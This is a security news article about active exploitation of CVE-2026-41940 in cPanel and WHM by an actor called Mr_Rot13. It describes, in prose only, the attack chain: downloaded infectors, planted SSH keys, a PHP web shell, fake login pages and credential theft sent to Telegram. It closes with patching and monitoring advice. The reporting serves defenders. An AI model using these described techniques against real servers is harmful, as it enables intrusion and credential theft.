A newly disclosed critical vulnerability in cPanel is already being actively exploited by cybercriminals to compromise servers, steal credentials, and deploy persistent backdoors. Security researchers have linked the attacks to a threat actor known as “Mr_Rot13,” who is using the flaw to install a malicious backdoor called “Filemanager” on vulnerable systems.
The vulnerability, tracked as CVE-2026-41940, affects both cPanel and WebHost Manager (WHM). The flaw allows attackers to bypass authentication protections and gain elevated access to targeted servers remotely. Because cPanel is widely used by hosting providers and website administrators worldwide, the exploitation of this vulnerability has raised serious concerns across the cybersecurity community.
According to researchers from QiAnXin XLab, attackers began exploiting the vulnerability shortly after public disclosure. The ongoing campaign has already involved more than 2,000 attacker IP addresses globally.
The malicious activity has been observed across multiple regions, with a large number of attacks originating from countries including Germany, the United States, Brazil, and the Netherlands. Researchers warn that automated exploitation attempts are increasing rapidly as cybercriminals race to compromise unpatched servers.
The attackers are not limiting their operations to a single objective. Instead, the compromised servers are being used for several malicious purposes, including:
- Deploying cryptocurrency miners
- Installing ransomware
- Spreading botnets
- Implanting persistent backdoors
- Stealing login credentials and sensitive information
This broad range of malicious activity suggests that the vulnerability is being leveraged by multiple threat actors or cybercrime groups for financial gain and long-term persistence.
Researchers discovered that the attack chain begins with a malicious shell script executed on a vulnerable cPanel server. The script uses tools such as wget or curl to download a Go-based malware infector from a remote domain.
Once downloaded, the malware performs several actions designed to maintain long-term access to the compromised system. One of its primary goals is installing an SSH public key on the server, allowing attackers to reconnect later without requiring passwords.
The malware also deploys a PHP-based web shell capable of:
- Uploading and downloading files
- Executing remote commands
- Managing compromised systems remotely
This web shell acts as a control mechanism for attackers, giving them complete control over infected environments.
One of the most dangerous parts of the attack involves credential theft. Researchers found that the attackers inject malicious JavaScript into compromised systems to display customized fake login pages.
These phishing pages are designed to look legitimate and trick administrators into entering their login credentials. Once entered, the stolen details are transmitted to attacker-controlled infrastructure.
Interestingly, the attackers use the ROT13 cipher to encode parts of their infrastructure and communication methods. This technique likely inspired the threat actor’s name, “Mr_Rot13.”
The stolen credentials can then be used to further compromise hosting accounts, websites, and internal systems connected to the affected servers.
After stealing credentials and establishing persistence, the attackers deploy a backdoor known as “Filemanager.” Researchers say the malware is cross-platform, meaning it can infect:
- Linux systems
- Windows devices
- macOS environments
The Filemanager backdoor provides advanced capabilities, including remote shell access, command execution, and file management functions. This gives attackers extensive control over infected systems and makes detection more difficult.
The malware is reportedly delivered through another shell script downloaded from a suspicious domain associated with the campaign.
The malware is also capable of harvesting large amounts of sensitive information from infected servers. Researchers found evidence that the attackers collect:
- Bash history files
- SSH credentials and configurations
- Device and system information
- Database passwords
- cPanel virtual aliases (valiases)
The stolen data is reportedly exfiltrated to a Telegram group operated by a user identified as “0xWR.” This method allows attackers to centralize and monitor stolen information from multiple victims efficiently.
The use of Telegram for command-and-control communication and data exfiltration has become increasingly common among cybercriminals due to its accessibility and encryption features.
Security researchers believe the group behind the attacks may have been active for several years without attracting significant attention.
Their assessment is based on evidence showing that the command-and-control infrastructure used in the latest attacks was previously linked to a PHP backdoor called “helper.php,” which was uploaded to VirusTotal back in April 2022. Additionally, one of the malicious domains connected to the campaign was first registered in October 2020.
Despite years of activity, the detection rate for malware samples and infrastructure associated with Mr_Rot13 has remained extremely low across many security products. This suggests the attackers have been successful at avoiding detection while quietly expanding their operations.
The active exploitation of CVE-2026-41940 highlights the growing risks facing organizations that rely on cPanel and WHM for server management. Because attackers are already automating exploitation attempts, unpatched systems are highly vulnerable to compromise.
Organizations and hosting providers should immediately:
- Apply the latest security patches from cPanel
- Monitor servers for unusual SSH keys and web shells
- Review login activity for suspicious behavior
- Scan systems for unauthorized scripts and malware
- Restrict remote access where possible
- Enable multi-factor authentication (MFA)
Cybersecurity experts also recommend reviewing server logs carefully to identify signs of exploitation or unauthorized access attempts.
Interesting Article : CVE-2026-6973, Ivanti EPMM RCE Flaw Exploited in Active Attacks